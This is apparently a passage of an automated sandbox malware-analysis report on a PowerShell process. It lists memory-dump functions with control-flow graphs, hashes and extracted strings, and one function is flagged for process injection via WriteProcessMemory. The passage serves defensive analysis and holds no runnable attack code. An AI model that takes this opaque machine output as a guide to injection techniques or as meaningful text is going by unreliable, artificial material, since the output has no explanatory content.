                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2618971938.00000000073D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073D0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_73d0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: $fq$$fq
                                                                                      • API String ID: 0-2537786760
                                                                                      • Opcode ID: 0e29e5e688cca137fed3e0f2660672f746d6b8f470e1c2d2da6596e98238959b
                                                                                      • Instruction ID: fa0cd7dbabdc7a7c171d5bed2d49e8431fe619aab7057e5947221505be67233f
                                                                                      • Opcode Fuzzy Hash: 0e29e5e688cca137fed3e0f2660672f746d6b8f470e1c2d2da6596e98238959b
                                                                                      • Instruction Fuzzy Hash: AA11EBF7604246CFFB118E04EA42A65BB79AF89290F19845AE56CC7192D737CC40CB51
                                                                                      Function 06F67A2A Relevance: 2.5, Strings: 2, Instructions: 35COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 3828 6f67a2a-6f67a31 3829 6f67a33-6f67a55 3828->3829 3830 6f679cf-6f679de 3828->3830 3831 6f66a17-6f66a20 3829->3831 3832 6f67a5b-6f67a66 3829->3832 3839 6f679ea-6f67a06 3830->3839 3833 6f66a22-6f66ee3 3831->3833 3834 6f66a29-6f67f83 3831->3834 3832->3831 3842 6f66eef-6f66f0a 3833->3842 3841 6f67a0b-6f67a1b 3839->3841 3841->3828 3843 6f66f0f-6f66f4a 3842->3843 3843->3831 3844 6f66f50-6f66f5b 3843->3844 3844->3831
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2615825801.0000000006F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F60000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6f60000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 3$@
                                                                                      • API String ID: 0-1582834413
                                                                                      • Opcode ID: 630ca12b76af11044c74546c18e2bd8e6409f0561700ec4a6e2efeb5bc969076
                                                                                      • Instruction ID: 79c76b69c227f5331aac81afaa4905c19732266dd97fd7543c033c071de9580b
                                                                                      • Opcode Fuzzy Hash: 630ca12b76af11044c74546c18e2bd8e6409f0561700ec4a6e2efeb5bc969076
                                                                                      • Instruction Fuzzy Hash: 1D11D374904268CFEB61CF55C894BDDB7F6BB08308F0486EAE50AA7240CB75AE85CF41
                                                                                      Function 06D03908 Relevance: 1.9, APIs: 1, Instructions: 401COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 3845 6d03908-6d0393a 3846 6d03940-6d03956 3845->3846 3847 6d039e1-6d03a2a 3845->3847 3848 6d03958 3846->3848 3849 6d0395b-6d0396e 3846->3849 3852 6d03a70 3847->3852 3853 6d03a2c-6d03a33 3847->3853 3848->3849 3849->3847 3854 6d03970-6d0397d 3849->3854 3855 6d03a73-6d03aaf 3852->3855 3856 6d03a44 3853->3856 3857 6d03a35-6d03a42 3853->3857 3858 6d03982-6d03994 3854->3858 3859 6d0397f 3854->3859 3868 6d03ab1-6d03aba 3855->3868 3869 6d03b2b-6d03b36 3855->3869 3860 6d03a46-6d03a48 3856->3860 3857->3860 3858->3847 3872 6d03996-6d039a0 3858->3872 3859->3858 3863 6d03a4a-6d03a4d 3860->3863 3864 6d03a4f-6d03a51 3860->3864 3870 6d03a6e 3863->3870 3865 6d03a62 3864->3865 3866 6d03a53-6d03a60 3864->3866 3871 6d03a64-6d03a66 3865->3871 3866->3871 3868->3869 3875 6d03abc-6d03ac2 3868->3875 3873 6d03b45-6d03b67 3869->3873 3874 6d03b38-6d03b3b 3869->3874 3870->3855 3871->3870 3877 6d039a2-6d039a4 3872->3877 3878 6d039ae-6d039e0 3872->3878 3886 6d03c28-6d03cd4 3873->3886 3887 6d03b6d-6d03b76 3873->3887 3874->3873 3879 6d03ac8-6d03ad5 3875->3879 3880 6d03d5c-6d03dc9 3875->3880 3877->3878 3882 6d03b22-6d03b29 3879->3882 3883 6d03ad7-6d03b01 3879->3883 3891 6d03dd9-6d03e12 WriteProcessMemory 3880->3891 3892 6d03dcb-6d03dd7 3880->3892 3882->3869 3882->3875 3899 6d03b03-6d03b06 3883->3899 3900 6d03b1e 3883->3900 3923 6d03cd6-6d03cec 3886->3923 3924 6d03cee-6d03d01 3886->3924 3887->3880 3889 6d03b7c-6d03bb1 3887->3889 3907 6d03bb3-6d03bc9 3889->3907 3908 6d03bcb-6d03bde 3889->3908 3895 6d03e14-6d03e1a 3891->3895 3896 6d03e1b-6d03e2f 3891->3896 3892->3891 3895->3896 3903 6d03b12-6d03b1b 3899->3903 3904 6d03b08-6d03b0b 3899->3904 3900->3882 3904->3903 3909 6d03be0-6d03be7 3907->3909 3908->3909 3911 6d03be9-6d03bfa 3909->3911 3912 6d03c0c-6d03c22 3909->3912 3911->3912 3917 6d03bfc-6d03c05 3911->3917 3912->3886 3912->3887 3917->3912 3925 6d03d03-6d03d0a 3923->3925 3924->3925 3926 6d03d19 3925->3926 3927 6d03d0c-6d03d12 3925->3927 3928 6d03d1a 3926->3928 3927->3926 3928->3928
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2612352503.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6d00000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: c6327c4a9e9439deed9bb4080169b46ee46ad6ff71da488f16bcf3af8193325b
                                                                                      • Instruction ID: 01c11f10fc41dca8e1aaca842c54a15156690d184357b7ecadd1e70802dc3ae2
                                                                                      • Opcode Fuzzy Hash: c6327c4a9e9439deed9bb4080169b46ee46ad6ff71da488f16bcf3af8193325b
                                                                                      • Instruction Fuzzy Hash: 60021574A01209DFDB54CF98D984A9EFBB2FF88314F258559E819AB391C731ED81CB90
                                                                                      Function 06F63EE8 Relevance: 1.6, Strings: 1, Instructions: 330COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 3993 6f63ee8-6f63f10 3994 6f63f17-6f63f3d 3993->3994 3995 6f63f12 3993->3995 3997 6f63f3f-6f63f42 3994->3997 3995->3994 3998 6f63f45-6f63f4b 3997->3998 3999 6f63f54-6f63f55 3998->3999 4000 6f63f4d 3998->4000 4008 6f641c1-6f64347 3999->4008 4000->3999 4001 6f640b4-6f640b6 4000->4001 4002 6f63fb2-6f63fc9 call 6f64579 4000->4002 4003 6f64131-6f641a7 4000->4003 4004 6f63f5a-6f63f6f call 6f64988 4000->4004 4005 6f640b8-6f6410f 4000->4005 4006 6f63f99-6f63f9f 4000->4006 4007 6f64122-6f64129 4000->4007 4000->4008 4009 6f640a1-6f640af 4000->4009 4010 6f63f8e-6f63f97 4000->4010 4011 6f6412d-6f6412f 4000->4011 4012 6f6412a-6f6412b 4000->4012 4001->4007 4030 6f63fcf-6f63ff0 4002->4030 4003->3998 4048 6f641ad-6f641b5 4003->4048 4034 6f63f75-6f63f8c 4004->4034 4005->3998 4047 6f64115-6f6411d 4005->4047 4013 6f63fa1 4006->4013 4014 6f63fa8-6f63fb0 4006->4014 4008->3998 4073 6f6434d-6f64355 4008->4073 4009->3998 4010->3998 4011->4007 4012->4007 4013->4005 4013->4008 4013->4014 4016 6f64031-6f64035 4013->4016 4017 6f6400c-6f64021 call 6f64908 4013->4017 4018 6f6405c 4013->4018 4019 6f6435a-6f644a0 call 6f65920 4013->4019 4014->3997 4024 6f64037-6f64050 4016->4024 4025 6f6405d-6f6405f 4016->4025 4042 6f64027-6f6402f 4017->4042 4018->4025 4074 6f644a6-6f644bf 4019->4074 4027 6f64052-6f6405a 4024->4027 4028 6f63ffa-6f64000 4024->4028 4025->4004 4027->4028 4036 6f64002 4028->4036 4037 6f64009-6f6400a 4028->4037 4030->4028 4035 6f63ff2-6f63ff8 4030->4035 4034->3997 4035->4028 4036->4016 4036->4017 4036->4018 4036->4037 4037->4016 4042->4028 4047->3998 4047->4007 4048->3998 4073->3998 4074->3998 4075 6f644c5-6f644cd 4074->4075 4075->3998
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2615825801.0000000006F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F60000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6f60000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: \bq
                                                                                      • API String ID: 0-3867547703
                                                                                      • Opcode ID: 027a841c8463914a50f1646d91b9465d9ac7bbf9c13de1d859e8eee9b93e5f87
                                                                                      • Instruction ID: 1314f5ce6db0defdcb6606395dd1d967adc03edc714fcc66b9db160b875de9e4
                                                                                      • Opcode Fuzzy Hash: 027a841c8463914a50f1646d91b9465d9ac7bbf9c13de1d859e8eee9b93e5f87
                                                                                      • Instruction Fuzzy Hash: A5E12670E01218CFEB94DFA9D885B9EBBB6FB49700F5090AAE819A7355DB305D81CF50
                                                                                      Function 06F63ED9 Relevance: 1.6, Strings: 1, Instructions: 328COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 4080 6f63ed9-6f63f10 4081 6f63f17-6f63f3d 4080->4081 4082 6f63f12 4080->4082 4084 6f63f3f-6f63f42 4081->4084 4082->4081 4085 6f63f45-6f63f4b 4084->4085 4086 6f63f54-6f63f55 4085->4086 4087 6f63f4d 4085->4087 4095 6f641c1-6f64347 4086->4095 4087->4086 4088 6f640b4-6f640b6 4087->4088 4089 6f63fb2-6f63fc9 call 6f64579 4087->4089 4090 6f64131-6f641a7 4087->4090 4091 6f63f5a-6f63f6f call 6f64988 4087->4091 4092 6f640b8-6f6410f 4087->4092 4093 6f63f99-6f63f9f 4087->4093 4094 6f64122-6f64129 4087->4094 4087->4095 4096 6f640a1-6f640af 4087->4096 4097 6f63f8e-6f63f97 4087->4097 4098 6f6412d-6f6412f 4087->4098 4099 6f6412a-6f6412b 4087->4099 4088->4094 4117 6f63fcf-6f63ff0 4089->4117 4090->4085 4135 6f641ad-6f641b5 4090->4135 4121 6f63f75-6f63f8c 4091->4121 4092->4085 4134 6f64115-6f6411d 4092->4134 4100 6f63fa1 4093->4100 4101 6f63fa8-6f63fb0 4093->4101 4095->4085 4160 6f6434d-6f64355 4095->4160 4096->4085 4097->4085 4098->4094 4099->4094 4100->4092 4100->4095 4100->4101 4103 6f64031-6f64035 4100->4103 4104 6f6400c-6f64021 call 6f64908 4100->4104 4105 6f6405c 4100->4105 4106 6f6435a-6f644a0 call 6f65920 4100->4106 4101->4084 4111 6f64037-6f64050 4103->4111 4112 6f6405d-6f6405f 4103->4112 4129 6f64027-6f6402f 4104->4129 4105->4112 4161 6f644a6-6f644bf 4106->4161 4114 6f64052-6f6405a 4111->4114 4115 6f63ffa-6f64000 4111->4115 4112->4091 4114->4115 4123 6f64002 4115->4123 4124 6f64009-6f6400a 4115->4124 4117->4115 4122 6f63ff2-6f63ff8 4117->4122 4121->4084 4122->4115 4123->4103 4123->4104 4123->4105 4123->4124 4124->4103 4129->4115 4134->4085 4134->4094 4135->4085 4160->4085 4161->4085 4162 6f644c5-6f644cd 4161->4162 4162->4085
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2615825801.0000000006F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F60000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6f60000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: \bq
                                                                                      • API String ID: 0-3867547703
                                                                                      • Opcode ID: 1708c15cfcef5a5d32b0bdcdbe72c112072fa191718389d44d7d0edea4c011fc
                                                                                      • Instruction ID: 87e88912dccb299ca95cd52f98d9883c2b85597158923ee3eae652add0485d26
                                                                                      • Opcode Fuzzy Hash: 1708c15cfcef5a5d32b0bdcdbe72c112072fa191718389d44d7d0edea4c011fc
                                                                                      • Instruction Fuzzy Hash: B3E11670E01218CFEB94DFA9D885B9EBBB2FB49700F5090A9E819A7355DB305D81CF51
                                                                                      Function 06D03D78 Relevance: 1.6, APIs: 1, Instructions: 61injectionCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 4167 6d03d78-6d03dc9 4169 6d03dd9-6d03e12 WriteProcessMemory 4167->4169 4170 6d03dcb-6d03dd7 4167->4170 4171 6d03e14-6d03e1a 4169->4171 4172 6d03e1b-6d03e2f 4169->4172 4170->4169 4171->4172
                                                                                      APIs
                                                                                      • WriteProcessMemory.KERNELBASE(?,?,00000000,?,00000001), ref: 06D03E05
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2612352503.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6d00000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID: MemoryProcessWrite
                                                                                      • String ID:
                                                                                      • API String ID: 3559483778-0
                                                                                      • Opcode ID: 70af87b0ed4e194e15145806b0fb9a6775a50f7e8bbb73542c45203ba75eb741
                                                                                      • Instruction ID: f339141e5be4a1919619ee4b49ba1dc7e75369144e91494e86b016a4dc00b61c
                                                                                      • Opcode Fuzzy Hash: 70af87b0ed4e194e15145806b0fb9a6775a50f7e8bbb73542c45203ba75eb741
                                                                                      • Instruction Fuzzy Hash: BB21EDB590034ADFDB10CF9AD885BDEBBF4FB48320F10852AE919A7350D374A940CBA1
                                                                                      Function 06D02E30 Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2612352503.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6d00000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID: InfoSystem
                                                                                      • String ID:
                                                                                      • API String ID: 31276548-0
                                                                                      • Opcode ID: 7677e707feb697f43da97b1f4c4d5cde38a5d0251f88822eb72294a17c6c4b03
                                                                                      • Instruction ID: 0c91cd552c8dcee6b6a48421d53ba970f6d0767032001889a35bce8c6f8ae67c
                                                                                      • Opcode Fuzzy Hash: 7677e707feb697f43da97b1f4c4d5cde38a5d0251f88822eb72294a17c6c4b03
                                                                                      • Instruction Fuzzy Hash: 2011E0B1C006599BDB10CF9AD944BDEFBF8FB48324F24815AD418A3340D7B46A44CFA5
                                                                                      Function 06F4B414 Relevance: 1.4, Strings: 1, Instructions: 196COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2615485861.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6f40000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: +(
                                                                                      • API String ID: 0-2817835279
                                                                                      • Opcode ID: 4085f8ab1ab576d16cf0a0d0b035840765ae5ed1cec31c0a8f94e0ce82a03938
                                                                                      • Instruction ID: 9209a2f0529593a53f530d6c16ae2f4b7e47ddc08cfbd9d8e2cc58370d7f46cd
                                                                                      • Opcode Fuzzy Hash: 4085f8ab1ab576d16cf0a0d0b035840765ae5ed1cec31c0a8f94e0ce82a03938
                                                                                      • Instruction Fuzzy Hash: E4718C34E41204DFCF44EFA8D894AADBFB2EF88311F148469E411AB796CE71D946CB90
                                                                                      Function 06F4AC50 Relevance: 1.4, Strings: 1, Instructions: 163COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2615485861.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6f40000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: (jq
                                                                                      • API String ID: 0-3225323518
                                                                                      • Opcode ID: 3b8a6847af0bc9607b7ebf33764f0804434e77e04965b6d53be13efd61668939
                                                                                      • Instruction ID: f95779b531020ad379e8551e722783a9a661bb7b768f6cd8eeee473807082f79
                                                                                      • Opcode Fuzzy Hash: 3b8a6847af0bc9607b7ebf33764f0804434e77e04965b6d53be13efd61668939
                                                                                      • Instruction Fuzzy Hash: DF51F431F005168FCB01DF68C8849AAFBB6FF89321B1586A9D9159B795D730F852CBC0
                                                                                      Function 06D19C00 Relevance: 1.4, Strings: 1, Instructions: 114COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2612516331.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6d10000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: $|W
                                                                                      • API String ID: 0-4121368492
                                                                                      • Opcode ID: aa585507e884308c5c3dfc741a1fb47309c37ca39cf34c34c3667de43acb245d
                                                                                      • Instruction ID: e5df680f71b912deb163660e9715ff37bb77f03f75da1fcdec4d67654df2b856
                                                                                      • Opcode Fuzzy Hash: aa585507e884308c5c3dfc741a1fb47309c37ca39cf34c34c3667de43acb245d
                                                                                      • Instruction Fuzzy Hash: 7251C374E01208DFDB58DFB9D5A4A9DBBF2BF89300F20802AD416AB365DB749941CF50
                                                                                      Function 06D19BF2 Relevance: 1.4, Strings: 1, Instructions: 107COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2612516331.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6d10000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: $|W
                                                                                      • API String ID: 0-4121368492
                                                                                      • Opcode ID: 1179a41aaa81610dd41c57e082002b1ec86164637e1e4bcc727812715d3c1a53
                                                                                      • Instruction ID: 654d8c230806cd01a9d58c16c93562936fd1fa386733a03a3f03bd11f56f3527
                                                                                      • Opcode Fuzzy Hash: 1179a41aaa81610dd41c57e082002b1ec86164637e1e4bcc727812715d3c1a53
                                                                                      • Instruction Fuzzy Hash: 2241C3B4E01208DFDB58CFB9D5A4ADDBBF2BF88300F20802AD419AB265DB749941CF50
                                                                                      Function 073D0468 Relevance: 1.3, Strings: 1, Instructions: 94COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2618971938.00000000073D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073D0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_73d0000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 4'fq
                                                                                      • API String ID: 0-2007657732
                                                                                      • Opcode ID: 59536da51f7f35ffac9936a378dae4079c398a78c62908930a150a75a9c0e743
                                                                                      • Instruction ID: 8b9d4acfe0e54f4dc82ee21cd736cccfb39943cf4ae7ab9b75cde1af55867d2a
                                                                                      • Opcode Fuzzy Hash: 59536da51f7f35ffac9936a378dae4079c398a78c62908930a150a75a9c0e743
                                                                                      • Instruction Fuzzy Hash: D93128F2A08202DFEF295E35A51477E7BA7AF81A40F544066D80CC7592EB39DC81CB62
                                                                                      Function 08166C48 Relevance: 1.3, Strings: 1, Instructions: 80COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2623383395.0000000008160000.00000040.00000800.00020000.00000000.sdmp, Offset: 08160000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_8160000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: (ofq
                                                                                      • API String ID: 0-334256475
                                                                                      • Opcode ID: 244cf7a5629adf6f56dbe30f8c14df388af3022f674c3078bb66c66bb8b81a32
                                                                                      • Instruction ID: 9890bf8487addce350f6d56106186b80fcd99a2f1a6ed4cc92b08ec4035a603c
                                                                                      • Opcode Fuzzy Hash: 244cf7a5629adf6f56dbe30f8c14df388af3022f674c3078bb66c66bb8b81a32
                                                                                      • Instruction Fuzzy Hash: 9821A670A04205EFDB64DF19C844BAA77B2FF60322F05806EE4958B194D771E8B1CB61
                                                                                      Function 06F6B37C Relevance: 1.3, Strings: 1, Instructions: 75COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2615825801.0000000006F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F60000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6f60000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: !
                                                                                      • API String ID: 0-2657877971
                                                                                      • Opcode ID: da3825284c0039637b3498663ef39bb99fe65bf39b0cd11752aa7a565cf4658d
                                                                                      • Instruction ID: 10b012b5caf66812c9633d0a664bf446d702ab6e0ec75fbbf752530f69bd26e8
                                                                                      • Opcode Fuzzy Hash: da3825284c0039637b3498663ef39bb99fe65bf39b0cd11752aa7a565cf4658d
                                                                                      • Instruction Fuzzy Hash: FF31F774E05219CFEB95CF95D884BEEB7F6AB49304F9080AAE809E7341CB345E858F41
                                                                                      Function 06F4E6F8 Relevance: 1.3, Strings: 1, Instructions: 72COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2615485861.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6f40000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: p<fq
                                                                                      • API String ID: 0-1940909823
                                                                                      • Opcode ID: aa7208bb6354b585ebad55fe3f074f9a442da9498b0a087283d220b9de7f0c09
                                                                                      • Instruction ID: 5abc30700561cf9159cb75765ed530bfb6dba554b60fac8eff08c3b022266f35
                                                                                      • Opcode Fuzzy Hash: aa7208bb6354b585ebad55fe3f074f9a442da9498b0a087283d220b9de7f0c09
                                                                                      • Instruction Fuzzy Hash: 4B215B35B041449FCB51DF2AC880AAA7FF6FF89210B1840A5FC55CB3A2CA31DC52DB20
                                                                                      Function 06F4E700 Relevance: 1.3, Strings: 1, Instructions: 72COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2615485861.0000000006F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F40000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6f40000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: p<fq
                                                                                      • API String ID: 0-1940909823
                                                                                      • Opcode ID: d072af4e6e147706e83c9198ae809c2c605cc3b70b987b1d7b3c315a5f175eb9
                                                                                      • Instruction ID: 1adcfcf003713da50bee4dab56a4993c1d5b9744d7bf31cec490c4a279965ffd
                                                                                      • Opcode Fuzzy Hash: d072af4e6e147706e83c9198ae809c2c605cc3b70b987b1d7b3c315a5f175eb9
                                                                                      • Instruction Fuzzy Hash: 1C213A75B042549FCB51DF2AC880EAA7FF9BF89210B094095FC54CB3A2DA35DC51DB60
                                                                                      Function 06F64689 Relevance: 1.3, Strings: 1, Instructions: 71COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2615825801.0000000006F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F60000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6f60000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: @Vq
                                                                                      • API String ID: 0-3744185692
                                                                                      • Opcode ID: ff7fe773cf9b8ef7d2b654cd0e0ffe323cc10d383d53063ac28751bfa564e168
                                                                                      • Instruction ID: 0af0612a2ccbc1bf73c58c408b954816fd3ba43991a93e6b97aee89b13968013
                                                                                      • Opcode Fuzzy Hash: ff7fe773cf9b8ef7d2b654cd0e0ffe323cc10d383d53063ac28751bfa564e168
                                                                                      • Instruction Fuzzy Hash: 69218970D042098FEB40EFAAC8406EEBBF6BB8A300F50846AE415A7290CB7959058F91
                                                                                      Function 06F64698 Relevance: 1.3, Strings: 1, Instructions: 69COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2615825801.0000000006F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F60000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6f60000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: @Vq
                                                                                      • API String ID: 0-3744185692
                                                                                      • Opcode ID: 772cfc80fa7cc6a88cde5f562f449f9d7ff1e4736e7272a691cbe8740bb7420d
                                                                                      • Instruction ID: d7550137c631bac29803188cae8044eece4b24d33a3064b25a65cd856bcf7c18
                                                                                      • Opcode Fuzzy Hash: 772cfc80fa7cc6a88cde5f562f449f9d7ff1e4736e7272a691cbe8740bb7420d
                                                                                      • Instruction Fuzzy Hash: 43218970D04209CFEB40EFAAD8806EEBBF6FB8A301F508429E415A7390CB7959448F91
                                                                                      Function 081667EC Relevance: 1.3, Strings: 1, Instructions: 68COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2623383395.0000000008160000.00000040.00000800.00020000.00000000.sdmp, Offset: 08160000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_8160000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 4'fq
                                                                                      • API String ID: 0-2007657732
                                                                                      • Opcode ID: d04f6dbc60fe42fedfa1104b905ab80f2865667ca8bfd5874da7050c8cd43d6f
                                                                                      • Instruction ID: 090429c60a24cfc62fc9e5ef4c59df51fd7c3a520ca9c8ca9072035beb3c064b
                                                                                      • Opcode Fuzzy Hash: d04f6dbc60fe42fedfa1104b905ab80f2865667ca8bfd5874da7050c8cd43d6f
                                                                                      • Instruction Fuzzy Hash: 19219370A00204CFDB54DF69C55067ABBF5EF94266F14806ED884CB261E731C9B1C7A1
                                                                                      Function 06F66ED4 Relevance: 1.3, Strings: 1, Instructions: 31COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2615825801.0000000006F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F60000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6f60000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 4
                                                                                      • API String ID: 0-4088798008
                                                                                      • Opcode ID: fc5b8368b2d8b0c05bef9b8d09470156813a344999b7010265ecdb54ebe9bb0b
                                                                                      • Instruction ID: b9a98ab3fbdde2cac6d8d56249199e286c97fc9ed52d76889b9abab820eab4de
                                                                                      • Opcode Fuzzy Hash: fc5b8368b2d8b0c05bef9b8d09470156813a344999b7010265ecdb54ebe9bb0b
                                                                                      • Instruction Fuzzy Hash: 79011674900268CFEB60CF14C888BDABBB1FB09304F4481E9E40AA7290CB75AE81DF41
                                                                                      Function 06F679A9 Relevance: 1.3, Strings: 1, Instructions: 27COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2615825801.0000000006F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F60000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_6f60000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: @
                                                                                      • API String ID: 0-2766056989
                                                                                      • Opcode ID: 7317f3d95e8aa94ff58b85cf9a88da19e7f9424783d46d7fee5767406b028584
                                                                                      • Instruction ID: e09f1179640655dea08431646b3b1b7f174670c7ecb1b570c2fbd7fe5c92a654
                                                                                      • Opcode Fuzzy Hash: 7317f3d95e8aa94ff58b85cf9a88da19e7f9424783d46d7fee5767406b028584
                                                                                      • Instruction Fuzzy Hash: 96F0C4749011188FDB14DF64C990ADDBBB6BF48300F4081AAC50AA7341CB31AE86CF40
                                                                                      Function 06F46F80 Relevance: 1.3, Strings: 1, Instructions: 25COMMON
